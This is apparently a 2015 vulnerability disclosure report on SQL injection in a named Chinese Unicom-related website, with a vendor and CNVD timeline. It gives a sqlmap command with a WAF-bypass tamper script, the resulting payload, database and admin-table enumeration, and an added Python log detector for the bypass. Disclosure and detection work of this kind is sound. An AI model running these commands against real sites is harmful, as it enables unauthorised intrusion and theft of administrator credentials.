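2015-07-30: Details reported to the vendor; awaiting vendor handling
2015-08-03: Vendor confirmed; details disclosed to the vendor only
2015-08-13: Details disclosed to core white hats and experts in related fields
2015-08-23: Details disclosed to regular white hats
2015-09-02: Details disclosed to intern white hats
2015-09-17: Details disclosed to the public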
sqlmap.py -u "http://www.chinaunicomsi.cn/cnc/cncsi.asp?id=%5c" --tamper=space2mssqlblank.py --current-db
There is a WAF; adding the tamper=space2mssqlblank.py script is enough to bypass it.
sqlmap identified the following injection points with a total of 65 HTTP(s) requests:
---
Parameter: id (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000

current database: 'oyy'

Database: oyy
[16 tables]
+-----------------+
| Admin           |
| BigClass_down   |
| Download        |
| Feedback        |
| News            |
| SmallClass      |
| SmallClass_down |
| WebBasicInfo    |
| bigClass        |
| book_setup      |
| dtproperties    |
| gonggao         |
| shop_pinglun    |
| sogo_link       |
| sysconstraints  |
| syssegments     |
+-----------------+

Database: oyy
Table: admin
[12 columns]
+---------------------+----------+
| Column              | Type     |
+---------------------+----------+
| Addtime             | datetime |
| admin               | nvarchar |
| aleave              | nvarchar |
| ArticleNum          | int      |
| bigclassauthorize   | nvarchar |
| ID                  | int      |
| LastLogintime       | datetime |
| LoginIP             | nvarchar |
| LoginNum            | int      |
| password            | nvarchar |
| smallclassauthorize | nvarchar |
| userkey             | int      |
+---------------------+----------+

Database: oyy
Table: admin
[8 entries]
+---------+----------------------------------+
| admin   | password                         |
+---------+----------------------------------+
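Added example, not part of the original report: a log-side check for the bypass noted above, where a tamper script rewrites the spaces in the payload. It folds the alternate blank bytes back to spaces before matching, so the spaced and the rewritten form of the same inline query are both flagged. The sample query strings are constructed, `naive_filter` is a hypothetical stand-in for a rule keyed on literal spaces, and treating bytes 0x01-0x1F as SQL Server blanks is an assumption.

```python
import re
from urllib.parse import unquote_to_bytes

# Assumption: SQL Server accepts bytes 0x01-0x1F as blanks between tokens, so
# the same statement can be written without a single 0x20.
BLANKS = re.compile(rb"[\x01-\x1f]+")
# Control bytes other than TAB, LF and CR never belong in a numeric id value.
ODD_CONTROL = re.compile(rb"[\x01-\x08\x0b\x0c\x0e-\x1f]")
SQL_PATTERNS = {
    "subquery": re.compile(rb"\(\s*select\b", re.I),
    "char_concat": re.compile(rb"char\(\d+\)\s*\+\s*char\(\d+\)", re.I),
    "case_when": re.compile(rb"\bcase\s+when\b", re.I),
}

def decode(raw_query):
    """Form-decode a raw query string to bytes ('+' is a space, %XX is a byte)."""
    return unquote_to_bytes(raw_query.replace("+", " "))

def naive_filter(raw_query):
    """Hypothetical rule keyed on literal spaces (not the site's actual WAF)."""
    decoded = decode(raw_query).lower()
    return b"select " in decoded or b" when " in decoded

def inspect_query(raw_query):
    """Return the reasons a raw query string looks like injected SQL."""
    decoded = decode(raw_query)
    reasons = ["control_bytes"] if ODD_CONTROL.search(decoded) else []
    normalized = BLANKS.sub(b" ", decoded)  # fold every blank byte to 0x20
    reasons += [name for name, rx in SQL_PATTERNS.items() if rx.search(normalized)]
    return reasons

# Constructed query strings shaped like the inline-query payload in the report.
SAMPLES = {
    "benign": "id=42",
    "spaces": "id=(SELECT+CHAR(113)%2BCHAR(107)%2B"
              "(CASE+WHEN+(1=1)+THEN+CHAR(49)+ELSE+CHAR(48)+END))",
    "blanks": "id=(SELECT%0BCHAR(113)%2BCHAR(107)%2B"
              "(CASE%04WHEN%02(1=1)%0FTHEN%01CHAR(49)%1FELSE%0ECHAR(48)%06END))",
}

if __name__ == "__main__":
    for label, query in SAMPLES.items():
        print(label, naive_filter(query), inspect_query(query))
```

A non-empty result on a parameter that should be a plain integer is worth alerting on by itself; the durable fix remains a parameterized query behind `id`.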
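Severity: Medium
Vulnerability Rank: 9
Confirmed: 2015-08-03 10:45
CNVD confirmed and reproduced the reported issue and has passed it via CNCERT to the Heilongjiang sub-center, which will coordinate follow-up handling with the organization that operates the website.
None yet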